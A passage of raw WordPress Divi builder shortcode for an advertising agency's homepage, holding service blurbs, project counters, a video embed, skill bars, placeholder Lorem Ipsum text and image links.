icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" title_text=\"home-office-02\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" title_text=\"home-office-05\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04.jpg\" title_text=\"home-office-04\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" 